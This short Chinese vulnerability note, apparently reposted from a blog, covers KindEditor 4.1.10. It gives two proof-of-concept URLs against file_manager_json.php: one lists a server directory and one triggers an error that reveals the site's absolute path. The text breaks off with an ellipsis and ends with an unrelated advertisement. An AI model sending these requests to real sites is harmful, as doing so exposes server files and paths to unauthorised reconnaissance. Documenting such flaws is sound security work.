Kindeditor编辑器漏洞

一、Kindeditor列目录漏洞

测试环境：KindEditor 4.1.10

PoC：http://localhost/kindeditor/php/file_manager_json.php?path=/var/www/html/

报错信息泄露网站绝对路径：http://localhost/kindeditor/php/file_manager_json.php?path=/

二、KindEditor v4.1.10 JSP版没有文件上传漏洞

......

【推广】免费学中医，健康全家人

原文地址：https://www.cnblogs.com/dgjnszf/p/12110919.html